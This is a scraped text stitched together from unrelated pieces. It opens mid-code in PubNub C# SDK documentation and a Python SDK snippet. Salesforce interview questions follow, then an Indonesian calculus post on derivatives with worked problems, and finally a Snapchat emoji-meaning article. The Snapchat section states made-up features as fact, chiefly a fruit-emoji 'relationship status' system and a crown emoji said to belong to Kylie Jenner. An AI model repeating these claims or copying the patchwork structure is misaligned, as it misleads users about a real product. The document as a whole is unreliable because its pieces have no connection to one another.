            Debug.WriteLine("In Example, SubscribeCallback message channel = " + messageResult.Channel);
            Debug.WriteLine("In Example, SubscribeCallback message channelGroup = " + messageResult.Subscription);
            Debug.WriteLine("In Example, SubscribeCallback message publishTimetoken = " + messageResult.Timetoken);
            Debug.WriteLine("In Example, SubscribeCallback message publisher = " + messageResult.Publisher);
            string jsonString = messageResult.Message.ToString();
            Dictionary<string, string> msg = pubnub.JsonPluggableLibrary.DeserializeToObject<Dictionary<string, string>>(jsonString);
            Debug.WriteLine("msg: " + msg["msg"]);
        }
    },
    (pubnubObj, presenceResult) => {
        if (presenceResult != null) {
            Debug.WriteLine("In Example, SubscribeCallback received PNPresenceEventResult");
            Debug.WriteLine(presenceResult.Channel + " " + presenceResult.Occupancy + " " + presenceResult.Event);
        }
    },
    (pubnubObj, statusResult) => {
        if (statusResult.Category == PNStatusCategory.PNConnectedCategory) {
            pubnub.Publish()
                .Channel("my_channel")
                .Message(message)
                .Execute(new PNPublishResultExt((publishResult, publishStatus) => {
                    if (!publishStatus.Error) {
                        Debug.WriteLine(string.Format("DateTime {0}, In Publish Example, Timetoken: {1}", DateTime.UtcNow, publishResult.Timetoken));
                    } else {
                        Debug.WriteLine(publishStatus.Error);
                        Debug.WriteLine(publishStatus.ErrorData.Information);
                    }
                }));
        }
    }
);
pubnub.AddListener(subscribeCallback);
pubnub.Subscribe<string>()
    .Channels(new string[] { "my_channel" }).Execute();

In addition to the Hello World sample code, we also provide some copy-and-paste snippets of common API functions:

Instantiate a new Pubnub instance. Only the SubscribeKey is mandatory. Also include PublishKey if you intend to publish from this instance, and the SecretKey if you wish to perform PAM administrative operations from this C# V4 instance.

For security reasons you should only include the secret key on a highly secured server. The secret key is only required for granting rights using our Access Manager. When you init with SecretKey, you get root permissions for the Access Manager. With this feature you don't have to grant access to your servers to access channel data. The servers get all access on all channels.
PNConfiguration pnConfiguration = new PNConfiguration();
pnConfiguration.PublishKey = "my_pubkey";
pnConfiguration.SubscribeKey = "my_subkey";
pnConfiguration.Secure = false;

Pubnub pubnub = new Pubnub(pnConfiguration);

// Add listener to receive Publish messages and Presence events
SubscribeCallbackExt generalSubscribeCallback = new SubscribeCallbackExt(
    delegate (Pubnub pubnubObj, PNMessageResult<object> message) {
        // Handle new message stored in message.Message
    },
    delegate (Pubnub pubnubObj, PNPresenceEventResult presence) {
        // handle incoming presence data
    },
    delegate (Pubnub pubnubObj, PNStatus status) {
        // the status object returned is always related to subscribe but could contain
        // information about subscribe, heartbeat, or errors
        // use the PNOperationType to switch on different options
        switch (status.Operation) {
            // let's combine unsubscribe and subscribe handling for ease of use
            case PNOperationType.PNSubscribeOperation:
            case PNOperationType.PNUnsubscribeOperation:
                // note: subscribe statuses never have traditional
                // errors, they just have categories to represent the
                // different issues or successes that occur as part of subscribe
                switch (status.Category) {
                    case PNStatusCategory.PNConnectedCategory:
                        // this is expected for a subscribe, this means there is no error or issue whatsoever
                        break;
                    case PNStatusCategory.PNReconnectedCategory:
                        // this usually occurs if subscribe temporarily fails but reconnects. This means
                        // there was an error but there is no longer any issue
                        break;
                    case PNStatusCategory.PNDisconnectedCategory:
                        // this is the expected category for an unsubscribe. This means there
                        // was no error in unsubscribing from everything
                        break;
                    case PNStatusCategory.PNUnexpectedDisconnectCategory:
                        // this is usually an issue with the internet connection, this is an error, handle appropriately
                        break;
                    case PNStatusCategory.PNAccessDeniedCategory:
                        // this means that PAM does not allow this client to subscribe to this
                        // channel and channel group configuration. This is another explicit error
                        break;
                    default:
                        // More errors can be directly specified by creating explicit cases for other
                        // error categories of `PNStatusCategory` such as `PNTimeoutCategory` or `PNMalformedFilterExpressionCategory` or `PNDecryptionErrorCategory`
                        break;
                }
                break;
            case PNOperationType.PNHeartbeatOperation:
                // heartbeat operations can in fact have errors, so it is important to check first for an error.
                if (status.Error) {
                    // There was an error with the heartbeat operation, handle here
                } else {
                    // heartbeat operation was successful
                }
                break;
            default:
                // Encountered unknown status type
                break;
        }
    }
);
pubnub.AddListener(generalSubscribeCallback);

// Add listener to receive Signal messages
SubscribeCallbackExt signalSubscribeCallback = new SubscribeCallbackExt(
    delegate (Pubnub pubnubObj, PNSignalResult<object> message) {
        // Handle new signal message stored in message.Message
    },
    delegate (Pubnub pubnubObj, PNStatus status) {
        // the status object returned is always related to subscribe but could contain
        // information about subscribe, heartbeat, or errors
    }
);
pubnub.AddListener(signalSubscribeCallback);

// Add listener to receive User, Space and Membership events
SubscribeCallbackExt objectsListenerSubscribeCallback = new SubscribeCallbackExt(
    delegate (Pubnub pnObj, PNObjectApiEventResult objectApiEventObj) {
        if (objectApiEventObj.Type == "user") {
            /* handle user related event */
        } else if (objectApiEventObj.Type == "space") {
            /* handle space related event */
        } else if (objectApiEventObj.Type == "membership") {
            /* handle membership related event */
        }
    },
    delegate (Pubnub pnObj, PNStatus pnStatus) {
        /* handle status for any errors */
    }
);
pubnub.AddListener(objectsListenerSubscribeCallback);

public class DevSubscribeCallback : SubscribeCallback {
    public override void Message<T>(Pubnub pubnub, PNMessageResult<T> message) {
        // Handle new message stored in message.Message
    }

    public override void Presence(Pubnub pubnub, PNPresenceEventResult presence) {
        // handle incoming presence data
    }

    public override void Signal<T>(Pubnub pubnub, PNSignalResult<T> signal) {
        // Handle new signal message stored in signal.Message
    }

    public override void Status(Pubnub pubnub, PNStatus status) {
        // the status object returned is always related to subscribe but could contain
        // information about subscribe, heartbeat, or errors
        // use the PNOperationType to switch on different options
        switch (status.Operation) {
            // let's combine unsubscribe and subscribe handling for ease of use
            case PNOperationType.PNSubscribeOperation:
            case PNOperationType.PNUnsubscribeOperation:
                // note: subscribe statuses never have traditional
                // errors, they just have categories to represent the
                // different issues or successes that occur as part of subscribe
                switch (status.Category) {
                    case PNStatusCategory.PNConnectedCategory:
                        // this is expected for a subscribe, this means there is no error or issue whatsoever
                        break;
                    case PNStatusCategory.PNReconnectedCategory:
                        // this usually occurs if subscribe temporarily fails but reconnects. This means
                        // there was an error but there is no longer any issue
                        break;
                    case PNStatusCategory.PNDisconnectedCategory:
                        // this is the expected category for an unsubscribe. This means there
                        // was no error in unsubscribing from everything
                        break;
                    case PNStatusCategory.PNUnexpectedDisconnectCategory:
                        // this is usually an issue with the internet connection, this is an error, handle appropriately
                        break;
                    case PNStatusCategory.PNAccessDeniedCategory:
                        // this means that PAM does not allow this client to subscribe to this
                        // channel and channel group configuration. This is another explicit error
                        break;
                    default:
                        // More errors can be directly specified by creating explicit cases for other
                        // error categories of `PNStatusCategory` such as `PNTimeoutCategory` or `PNMalformedFilterExpressionCategory` or `PNDecryptionErrorCategory`
                        break;
                }
                break;
            case PNOperationType.PNHeartbeatOperation:
                // heartbeat operations can in fact have errors, so it is important to check first for an error.
                if (status.Error) {
                    // There was an error with the heartbeat operation, handle here
                } else {
                    // heartbeat operation was successful
                }
                break;
            default:
                // Encountered unknown status type
                break;
        }
    }

    public override void ObjectEvent(Pubnub pubnub, PNObjectApiEventResult objectEvent) {
        // handle incoming user, space and membership event data
    }
}

// Usage of the above listener
DevSubscribeCallback regularListener = new DevSubscribeCallback();
pubnub.AddListener(regularListener);

SubscribeCallbackExt listenerSubscribeCallback = new SubscribeCallbackExt(
    (pubnubObj, message) => { },
    (pubnubObj, presence) => { },
    (pubnubObj, status) => { });
pubnub.AddListener(listenerSubscribeCallback);

// some time later
pubnub.RemoveListener(listenerSubscribeCallback);

Category / Description

PNNetworkIssuesCategory: The SDK is not able to reach the PubNub Data Stream Network because the machine or device is not connected to the Internet, the connection has been lost, your ISP (Internet Service Provider) is having trouble, or the SDK is behind a proxy.

PNUnknownCategory: The SDK can return this category if the captured error is an insignificant client-side error or of a type not known at the time of SDK development.

PNBadRequestCategory: The PubNub C# SDK will send PNBadRequestCategory when some parameter is missing, such as the subscribe key or publish key.

PNTimeoutCategory: Processing has failed because of a request timeout.

PNReconnectedCategory: The SDK was able to reconnect to PubNub.

PNConnectedCategory: The SDK subscribed with a new mix of channels (fired every time the channel / channel group mix changes).

Call Time to verify the client connectivity to the origin:

pubnub.Time()
    .Execute(new PNTimeResultExt(
        (result, status) => {
            // handle time result.
        }
    ));

pubnub.Subscribe<string>()
    .Channels(new string[] {
        // subscribe to channels
        "my_channel"
    })
    .Execute();

The response of the call is handled by adding a Listener. Please see the Listeners section for more details. Listeners should be added before calling the method.

Publish a message to a channel:

string[] arrayMessage = new string[] { "hello", "there" };

pubnub.Publish()
    .Channel("suchChannel")
    .Message(arrayMessage.ToList())
    .Execute(new PNPublishResultExt(
        (result, status) => {
            // handle publish result, status always present, result if successful
            // status.Error to see if error happened
        }
    ));

Get occupancy of who's here now on the channel by UUID:

Requires that the Presence add-on is enabled for your key. How do I enable add-on features for my keys? - see http://www.pubnub.com/knowledge-base/discussion/644/how-do-i-enable-add-on-features-for-my-keys

pubnub.HereNow()
    // tailor the next two lines to example
    .Channels(new string[] { "coolChannel", "coolChannel2" })
    .IncludeUUIDs(true)
    .Execute(new PNHereNowResultExt(
        (result, status) => {
            if (status.Error) {
                // handle error
                return;
            }
            if (result.Channels != null && result.Channels.Count > 0) {
                foreach (KeyValuePair<string, PNHereNowChannelData> kvp in result.Channels) {
                    PNHereNowChannelData channelData = kvp.Value;
                    Console.WriteLine("---");
                    Console.WriteLine("channel:" + channelData.ChannelName);
                    Console.WriteLine("occupancy:" + channelData.Occupancy);
                    Console.WriteLine("Occupants:");
                    if (channelData.Occupants != null && channelData.Occupants.Count > 0) {
                        for (int index = 0; index < channelData.Occupants.Count; index++) {
                            PNHereNowOccupantData occupant = channelData.Occupants[index];
                            Console.WriteLine(string.Format("uuid: {0}", occupant.Uuid));
                            Console.WriteLine(string.Format("state: {0}", (occupant.State != null) ?
                                pubnub.JsonPluggableLibrary.SerializeToJsonString(occupant.State) : ""));
                        }
                    }
                }
            }
        }
    ));

Subscribe to realtime Presence events, such as join, leave, and timeout, by UUID. Setting the presence attribute to a callback will subscribe to presence events on my_channel:

Requires that the Presence add-on is enabled for your key. How do I enable add-on features for my keys? - see http://www.pubnub.com/knowledge-base/discussion/644/how-do-i-enable-add-on-features-for-my-keys

pubnub.Subscribe<string>()
    .Channels(new string[] {
        // subscribe to channels
        "my_channel"
    })
    .WithPresence() // also subscribe to related presence information
    .Execute();

The response of the call is handled by adding a Listener. Please see the Listeners section for more details. Listeners should be added before calling the method.

Retrieve published messages from archival storage:

Requires that the Storage and Playback add-on is enabled for your key. How do I enable add-on features for my keys? - see http://www.pubnub.com/knowledge-base/discussion/644/how-do-i-enable-add-on-features-for-my-keys

pubnub.History()
    .Channel("history_channel") // where to fetch history from
    .Count(100) // how many items to fetch
    .Execute(new PNHistoryResultExt(
        (result, status) => { }
    ));

pubnub.Unsubscribe<string>()
    .Channels(new string[] { "my_channel" })
    .Execute();

The response of the call is handled by adding a Listener. Please see the Listeners section for more details. For more details, please see the Destroy section.

pubnub.Destroy();
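As a side-by-side reference only (this sketch is not part of these C# docs), the analogous configure-and-publish flow in PubNub's Python SDK looks roughly like the following; the keys and channel name are placeholders:

# Rough sketch of the equivalent flow in PubNub's Python SDK.
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub

pnconfig = PNConfiguration()
pnconfig.subscribe_key = "my_subkey"   # placeholder key
pnconfig.publish_key = "my_pubkey"     # placeholder key
pnconfig.uuid = "PubNubPythonExample"
pubnub = PubNub(pnconfig)

# sync() blocks and returns an envelope with .status and .result
envelope = pubnub.publish().channel("my_channel").message({"msg": "hello"}).sync()
if not envelope.status.is_error():
    print("Timetoken:", envelope.result.timetoken)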
SalesForce Interview Questions and Answers For Graduates, Part 1

1. What is the difference between a private cloud and a public cloud? Is salesforce.com a private cloud or a public cloud?

Public Cloud: Cloud services are provided "as a Service" over the Internet with little or no control over the underlying infrastructure. The same resources are used by more than one tenant (customer).

Private Cloud: Cloud services are provided "as a service" but are deployed over a hosted data center or company intranet. This is a private product for an organization, offering advanced security.

Salesforce.com: It is a public cloud, as data from more than one tenant resides on the same servers, hosted in salesforce.com data centers.

2. What are the different kinds of reports?

1. Tabular: Tabular reports are the simplest and fastest way to look at data. They are made of an ordered set of fields in columns, with each matching record listed in a row. They can't be used to create charts or groups of data, and can be used in dashboards only if rows are limited. Tabular reports are best for creating a list with a single grand total, or lists of records. Examples include activity reports and contact mailing lists.

2. Summary: These are similar to tabular reports, but they also allow users to view subtotals, create charts, and group rows of data. They can be used as the source report for dashboard components. Use this type when you want a report to show subtotals of the value of a particular field, or when you want to create a hierarchical list, such as all opportunities for your team, subtotaled by Stage and Owner. On the report run page, summary reports with no groupings are shown as tabular reports.

3. Matrix: Matrix reports are similar to summary reports but allow you to group and summarize data by both rows and columns. They can be used as the source report for dashboard components. Use this type for comparing related totals, especially if you have large amounts of data to summarize and you need to compare values in several different fields, or you want to look at data by date and by geography, product, or person. Matrix reports without at least one row and one column grouping show as summary reports on the report run page.

4. Joined: Joined reports let you create multiple report blocks that provide different views of your data. Each block acts like a "sub-report," with its own columns, sorting, fields, and filtering. A joined report can even contain data from different report types.

3. What are the different kinds of dashboard components?

1. Chart: Use it when you want to show data graphically.

2. Gauge: Use it when you have a single value that you want to show within a range of custom values.

3. Metric: Use it when you have one key value to display. Enter metric labels directly on components by clicking the empty text field next to the grand total. Metric components placed directly above and below each other in a dashboard column are displayed together as a single component.

4. Table: Use it to show a set of report data in column form.

5. Visualforce Page: Use it when you want to create a custom component or show information not available in another component type.

6. Custom S-Control: It can contain any type of content that can be displayed or run in a browser, for example an ActiveX control, an Excel file, a Java applet, or a custom HTML Web form.

4. What actions can be performed using Workflows?

The following workflow actions can be performed in a workflow:
1. Email Alert: Email alerts are workflow and approval actions that are generated by a workflow rule or approval process and sent, using an email template, to Salesforce users or others.

2. Field Update: Field updates are workflow and approval actions that specify the field you want updated and the new value for it. Depending on the type of field, you can choose to make the value blank, apply a specific value, or calculate a value based on a formula you create.

3. Task: Assigns a task to a user you specify. You can specify the Status, Priority, Subject, and Due Date of the task. Tasks are workflow and approval actions that are triggered by workflow rules or approval processes.

4. Outbound Message: An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint you designate, such as an external service. It sends the data in the specified fields in the form of a SOAP message to the endpoint.

5. What are groups in SFDC and what is their use?

Groups are sets of users. They can contain individual users, other groups, the users in a particular role or territory, or the users in a particular role or territory plus all of the users below that role or territory in the hierarchy.

There are two types of groups:

Personal groups: Each user can create groups for their personal use.

Public groups: Only administrators can create public groups. They can be used by everyone in the organization.

You can use groups in the following ways:

To set up default sharing access via a sharing rule
To add multiple users to a Salesforce CRM Content library
To share your records with other users
To specify that you want to synchronize contacts owned by other users
To assign users to specific actions in Salesforce Knowledge

6. What is the Visualforce View State?

Visualforce pages that contain a form component also contain an encrypted, hidden form field that encapsulates the view state of the page. This view state is automatically created and, as its name suggests, holds the state of the page: state that includes the components, field values, and controller state.

7. Which objects can be imported by the Import Wizard?

The following objects can be imported using the Import Wizard:

Accounts
Contacts
Leads
Solutions
Custom Objects

8. What is a Profile and what are its components?

A profile contains user permissions and access settings that control what users can do within their organization. It is a collection of settings and permissions that define how a user accesses records; it determines how users see data and what they can do within the application. A profile can have many users, but a user can have only one profile.

Profile components:

Which standard and custom apps users can view
Which tabs users can view
Which record types are available to users
Which page layouts users see
Object permissions that allow users to create, read, edit, and delete records
Which fields within objects users can view and edit
Permissions that allow users to manage the system and apps within it
Which Apex classes and Visualforce pages users can access
Which desktop clients users can access
The hours during which and IP addresses from which users can log in
Which service providers users can access (if Salesforce is enabled as an identity provider)

9. What is a PermissionSet?

A PermissionSet represents a set of permissions that's used to grant additional access to one or more users without changing their profile or reassigning profiles. You can use permission sets to grant access, but not to deny access.
Every PermissionSet is associated with a user license. You can only assign permission sets to users who have the same user license that's associated with the permission set. If you want to assign similar permissions to users with different licenses, create multiple permission sets with the same permissions, but with different licenses.

Permission sets include settings for:

Assigned apps
Object settings, which include:
  Tab settings
  Object permissions
  Field permissions
App permissions
Apex class access
Visualforce page access
System permissions
Service providers (only if you've enabled Salesforce as an identity provider)

10. Profiles vs Permission Sets: Permissions and Access Settings

1. User permissions and access settings specify what users can do within an organization.

2. Permissions and access settings are specified in user profiles and permission sets. Every user is assigned only one profile, but can also have multiple permission sets.

3. When determining access for your users, it's a good idea to use profiles to assign the minimum permissions and access settings for specific groups of users, then use permission sets to grant additional permissions. The following table shows the types of permissions and access settings that are specified in profiles and permission sets. Some profile settings aren't included in permission sets.
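As a quick illustration of the profile/permission-set split, here is a hedged sketch that uses the third-party simple_salesforce Python library to list which permission sets are assigned to a given user. The credentials and username are placeholders; PermissionSetAssignment is the standard object that links users to permission sets (note that the org may also return some profile-owned rows, so treat this as a starting point rather than a definitive report):

# Sketch only: assumes the simple_salesforce package and placeholder credentials.
from simple_salesforce import Salesforce

sf = Salesforce(username="user@example.com",
                password="...",
                security_token="...")

soql = (
    "SELECT PermissionSet.Name "
    "FROM PermissionSetAssignment "
    "WHERE Assignee.Username = 'user@example.com'"
)
for row in sf.query(soql)["records"]:
    # Each row names one permission set granted on top of the user's profile.
    print(row["PermissionSet"]["Name"])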
Himpasikom Learning Community

Mengenal Turunan Fungsi (Understanding the Derivative of a Function)

Sarah Anjani · Dec 4, 2022 · 5 min read

Table of contents
• Definition
• Properties of the Derivative
• Practice Problems

Definition

The derivative of a function \( f \) is the function \( f' \) whose value at \( c \) is

\[f' (c) = \lim_{h \to 0} \frac{f(c+h) - f(c)}{h}\]

If \( f \) has a derivative at every \( x \) in its domain, then:

\[f' (x) = \lim_{h \to 0} \frac{f(x+h) - f(x)}{h}\]

If \( y = f(x) \), the derivative of \( y \) (equivalently, of \( f \)) is written \( y' \), \( \frac{dy}{dx} \), \( f'(x) \), or \( \frac{df(x)}{dx} \).

Properties of the Derivative

If \( k \) is a constant, \( f \) and \( g \) are differentiable functions, and \( u \) and \( v \) are functions of \( x \) with \( u = f(x) \) and \( v = g(x) \), then:

1. If \( y = k \, u \) then \( y' = k \, u' \)
2. If \( y = u + v \) then \( y' = u' + v' \)
3. If \( y = u - v \) then \( y' = u' - v' \)
4. If \( y = u \, v \) then \( y' = u' v + u \, v' \)
5. If \( y = \frac{u}{v} \) then \( y' = \frac{ u' v - u v' }{ v^2 } \)

Practice Problems

Find \( \frac{dy}{dx} \) for each of the following:

$$ \begin{align} \text{1. } \ y &= ( 3x^4 + 2x^2 + x ) ( x^2 + 7 ) \\ &= 3x^6 + 21x^4 + 2x^4 + 14x^2 + x^3 + 7x \\ &= 3x^6 + 23x^4 + x^3 + 14x^2 + 7x \\ y' &= 18x^5 + 92x^3 + 3x^2 + 28x + 7 \end{align} $$

$$ \begin{align} \text{2. } \ y &= (x^3 + 3x^2) (4x^2 + 2) \\ &= 4x^5 + 2x^3 + 12x^4 + 6x^2 \\ &= 4x^5 + 12x^4 + 2x^3 + 6x^2 \\ y' &= 20x^4 + 48x^3 + 6x^2 + 12x \end{align} $$

$$ \begin{align} \text{3. } \ y = \frac{1}{3x^2 + 1}& \\ \text{Let: } \ u &= 1; \ u' = 0 \\ v &= 3x^2 + 1; \ v' = 6x \\ \text{Then, } \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ &= \frac{ 0(3x^2 + 1) - 1(6x) }{ (3x^2 + 1)^2 } \\ &= \frac{ -6x }{ (3x^2 + 1)^2 } \end{align} $$

$$ \begin{align} \text{4. } \ y = \frac{2}{5x^2 - 1}& \\ \text{Let: } \ u &= 2; \ u' = 0 \\ v &= 5x^2 - 1; \ v' = 10x \\ \text{Then, } \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ &= \frac{ 0(5x^2 - 1) - 2(10x) }{ (5x^2 - 1)^2 } \\ &= \frac{ -20x }{ (5x^2 - 1)^2 } \end{align} $$

$$ \begin{align} \text{5. } \ y = \frac{1}{4x^2 - 3x + 9}& \\ \text{Let: } \ u &= 1; \ u' = 0 \\ v &= 4x^2 - 3x + 9; \ v' = 8x - 3 \\ \text{Then, } \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ &= \frac{ -1 (8x-3) }{ (4x^2 - 3x + 9)^2 } \\ &= \frac{ -8x+3 }{ (4x^2 - 3x + 9)^2 } \end{align} $$

$$ \begin{align} \text{6. } \ y = \frac{x-1}{x+1}& \\ \text{Let: } \ u &= x-1; \ u' = 1 \\ v &= x+1; \ v' = 1 \\ \text{Then, } \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ &= \frac{ 1(x+1) - (x-1)(1) }{ (x+1)^2 } \\ &= \frac{ x+1 - x+1 }{ (x+1)^2 } \\ &= \frac{2}{(x+1)^2} \end{align} $$

$$ \begin{align} \text{7. } \ y = \frac{2x^2 - 3x + 1}{2x + 1}& \\ \text{Let: } \ u &= 2x^2 - 3x + 1; \ u' = 4x - 3 \\ v &= 2x + 1; \ v' = 2 \\ \text{Then, } \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ &= \frac{ ( 4x-3 )( 2x+1 ) - ( 2x^2 - 3x + 1 )(2) }{ (2x+1)^2 } \\ &= \frac{ 8x^2 + 4x - 6x - 3 - 4x^2 + 6x - 2 }{ (2x+1)^2 } \\ &= \frac{ 4x^2 + 4x - 5 }{ (2x+1)^2 } \end{align} $$

Find \( f''(x) \) for each of the following:
$$ \begin{align} \text{1. } \ f(x) &= \sqrt[5]{x^2} + \frac{1}{ \sqrt{x} } = x^{\frac{2}{5}} + x^{-\frac{1}{2}} \\ f'(x) &= \frac{2}{5}x^{ -\frac{3}{5} } - \frac{1}{2}x^{ -\frac{3}{2} } \\ f''(x) &= - \frac{6}{25}x^{ -\frac{8}{5} } + \frac{3}{4}x^{ -\frac{5}{2} } \end{align} $$

$$ \begin{align} \text{2. } \ f(x) &= \sqrt{x} \left( 3x + \frac{1}{3x} \right) \left( 3x - \frac{1}{3x} \right) \\ &= \left( 3x^{\frac{3}{2}} + \frac{1}{3}x^{-\frac{1}{2}} \right) \left( 3x - \frac{1}{3}x^{-1} \right) \\ &= 9x^{ \frac{5}{2} } - x^{\frac{1}{2}} + x^{\frac{1}{2}} - \frac{1}{9}x^{ -\frac{3}{2} } = 9x^{ \frac{5}{2} } - \frac{1}{9}x^{ -\frac{3}{2} } \\ f'(x) &= \frac{45}{2}x^{ \frac{3}{2} } + \frac{1}{6}x^{-\frac{5}{2}} \\ f''(x) &= \frac{135}{4}x^{\frac{1}{2}} - \frac{5}{12}x^{ -\frac{7}{2} } \end{align} $$

$$ \begin{align} \text{3. } \ f(x) &= (5x^2 - 1) (x^2 + 4x - 2) \\ &= 5x^4 + 20x^3 - 10x^2 - x^2 - 4x + 2 \\ &= 5x^4 + 20x^3 - 11x^2 - 4x + 2 \\ f'(x) &= 20x^3 + 60x^2 - 22x - 4 \\ f''(x) &= 60x^2 + 120x - 22 \end{align} $$
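These computations are easy to machine-check. Below is a small sketch using the sympy library (an assumption on my part; the post itself does not rely on any software) that verifies problem 1 of the second set:

import sympy as sp

x = sp.symbols('x', positive=True)
f = x**sp.Rational(2, 5) + x**sp.Rational(-1, 2)

f1 = sp.diff(f, x)     # (2/5)*x**(-3/5) - (1/2)*x**(-3/2)
f2 = sp.diff(f, x, 2)  # -(6/25)*x**(-8/5) + (3/4)*x**(-5/2)

print(f1)
print(f2)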
Snapchat Emojis Meaning

Snapchat is a very fun social media platform that allows you to share your life's best moments, whether they are with your friends or family, or just you travelling around the world. But using Snapchat and getting to know the basics is quite challenging for new users, as Snapchat is quite different from other social media apps such as Instagram. Even if you are a veteran Snapchat user, you still might be missing out on some of its hidden features and easter eggs.

It is not so hard to figure out that the Snapchat emoji next to your score is basically your Zodiac sign. But one feature that most people wonder about is why the emojis beside a friend's name keep changing. Did you know those emojis have a significant meaning, or did you believe they are just normal emojis that Snapchat shows randomly? If you believed that, you still have a lot to figure out. Hence, if you also wonder about those Snapchat emblems and what their actual meanings are, stick with this article and read it till the end, as we are aiming to make you a Snapchat master. Give it a read and clear up all your doubts about Snapchat emojis.

What Are Snapchat Emojis?

Snapchat is unique when compared to any other social media platform. While other platforms might be tracking your details and activity as well, Snapchat does not hide it from you. As you send snaps to your friends on Snapchat, it keeps track of your messaging habits and builds a list of your best friends. Snapchat figures out the people you share your snaps with and the people who send you snaps. As a result, following the Snapchat emoji chart, it assigns an emoji and places it beside your friend's name.

These Snapchat emojis represent your level of interaction with your friends, and there are different emojis available for different conditions. That's why not everyone on your friends list has the same emoji next to their name. It's not just about you: the interaction and response you are getting from the other party also affect the emoji shown.

There are even certain emojis that are associated with celebrities or verified people on Snapchat. For instance, if you ever wonder what the crown means on Snapchat: it represents Kylie Jenner, and you can call it her signature emoji on Snapchat. And if you wonder what the Unicorn emoji means on Snapchat, the simple answer is that it signifies a bisexual woman who loves to get intimate with an existing couple of a heterosexual male and a bisexual female.

What do the emojis beside your friend's name mean?

1. Yellow Heart 💛

If you see a Yellow Heart emoji appearing beside any of your friends' names, it signifies that you send most of your snaps to that particular friend and you have a great friendship.

2. Red Heart ❤️

If you maintain the streak with a friend that already has a Yellow Heart emoji beside their name, after a couple of weeks the Yellow Heart emoji will eventually turn into a Red Heart emoji, which signifies the two of you are BFFs.

3. Two Pink Hearts 💕

Another level of friendship is when the Two Pink Hearts emoji starts to appear. It all works in a cycle: the Yellow Heart comes first, then a Red Heart, and when you manage to keep that friend at the top of your best friends list, he/she becomes your Super BFF, and the emoji turns into the Two Pink Hearts emoji.
You can't achieve the Two Pink Hearts emoji with someone in one go; it takes time to build a strong relationship: at least two months, according to Snapchat.

4. Smile Face 😊

Since Snapchat personalizes a list of your top 10 friends, a Smile Face emoji appears beside those friends who are a part of that list, but not beside your number one friend. Obviously, that's someone special, and Snapchat has something better to show for that one friend of yours.

5. Baby Face 👶

Most people wonder what the baby face means on Snapchat, because it's unique and we don't see it that often. Whenever you add a new friend on Snapchat and begin chatting, Snapchat shows a Baby Face emoji, treating him/her like a new member of your Snapchat family. Although the emoji won't last there for long, knowing why it's there is just a good piece of knowledge.

6. Sunglass Face 😎

Everyone on Snapchat gets their own personalized list of Best Friends, so there are chances that someone is on your Best Friends list as well as on someone else's. In that case, if two people have mutual Best Friend(s), a Sunglass Face will show up beside their name.

7. Grimacing Face 😬

If you see a Grimacing Face beside any of your friends' names on Snapchat, it is a clear indication that the two of you have the same number one Best Friend. Don't be over-possessive; it's just Snapchat.

8. Smirking Face 😏

The Smirking Face emoji on Snapchat signifies that you are in another person's top friends, while they are not in your list of top 10 friends. In other words, your top 10 friends list on Snapchat does not include that person, but on their list of top friends, you are there.

9. Fire 🔥

The meaning of this emoji is super simple and clear: you are on fire! Not literally, but in terms of sharing snaps with your friends. If you are aware of making streaks on Snapchat, the Fire emoji is used for that purpose.

10. 100 💯

As we just discussed, the Fire emoji indicates your current Snapstreak with your friends. If the streak count reaches 100, the corresponding emoji will appear beside the Fire emoji. However, the emoji will be there for 24 hours only, since it will change to 101 the next day, provided you don't forget to send a snap. It would be sad to lose the streak after 100, as you would have to begin from the start once again.

11. Hourglass

You shouldn't be seeing this emoji at all if you love your streaks on Snapchat. As you might already know, you get 24 hours to send a snap to maintain a streak. If you forget to send the streak and the 24-hour window is about to end, the Fire emoji will turn into an Hourglass emoji, which indicates that only a few hours are left in which you can try to save your streak. Want to know how long the hourglass timer lasts? Check this article.

12. Sparkles

If you are chatting with a group of friends on Snapchat, the Sparkles emoji will appear, which makes it easier to identify group members in the chat list. Don't confuse this one with other emojis, as the Snapchat Star emoji meanings are different.

Also read: How to Make a Shortcut on Snapchat for a Group of Friends

13. Gold Star 🌟

The meaning of the Gold Star emoji on Snapchat is quite clear and straightforward.
If you or any of your other friends on Snapchat have replayed a mutual friend's snap in the last 24 hours, the Gold Star emoji will let you know about that.

14. Birthday Cake 🎂

This emoji is a no-brainer, as Snapchat has records of everyone's personal data, including birthdates. So, as a gesture of goodwill, Snapchat sends you birthday wishes and also tells your other friends about your birthday by showing the Birthday Cake emoji. Thus, if you see it beside someone's name on your list, don't forget to wish them a Happy Birthday!

Relationship Emojis on Snapchat

Most Snapchat users who have been using the app for a long time still don't know that you can set your relationship status. Yes, this option is there too, with a slight twist, all thanks to the Snapchat emblems and the fruit emoji icons. Thus, if you don't know the meaning of these emojis, it might be hard for you to figure out someone else's relationship status.

1. Red Circle 🔴

A red circle in someone's relationship status states that they are not ready for a long-term relationship, but are open to all propositions.

2. Blue Circle 🔵

The Blue Circle is a clear indication that the person is single, so that might be a good chance for you to talk and tell them if you like them. But a blue circle does not mean they are looking for a relationship.

3. Cherry 🍒

People on Snapchat who set the Cherry emoji as their relationship status are in a healthy relationship with someone, and everything's going well.

4. Pineapple 🍍

Out of all the fruit emojis on Snapchat, the Pineapple is the same as "It's complicated!" on Facebook. Even we can't explain this complicated thing to you.

5. Lemon 🍋

For a person who is currently in a relationship with someone, but things are not working out and they want to be out of it, a Lemon emoji will appear as the relationship status.

6. Strawberry 🍓

What does the Strawberry mean on Snapchat? Here's your answer. You will be seeing this one a lot, as it appears when someone has been looking for the right person but has not been able to find them for a long time. Maybe you can talk to them and make this Strawberry emoji turn into a Cherry emoji for them.

7. Apple 🍎

If a person is engaged and going to marry soon, the Apple emoji will let you know that.

8. Banana 🍌

The Banana emoji on Snapchat signifies that the person is married.

9. Avocado 🥑

Most people wonder what the avocado means on Snapchat. An Avocado emoji appears when someone thinks they are the better half in a relationship.

10. Chestnut 🌰

If a person is in a happy long-term relationship and wants to marry their partner, but is not even engaged yet, the Chestnut emoji is the perfect one to show that.

These were some of the most popular fruit emojis on Snapchat that are used to symbolize various relationship statuses. If you wonder why there is no Peach on the list, and what the Peach emoji means on Snapchat: as of now, it has no significant meaning, other than that people use it to symbolize buttocks, bum, or any other word you can use to describe the area, as the peach emoji looks like it.

Snapchat Status Icons

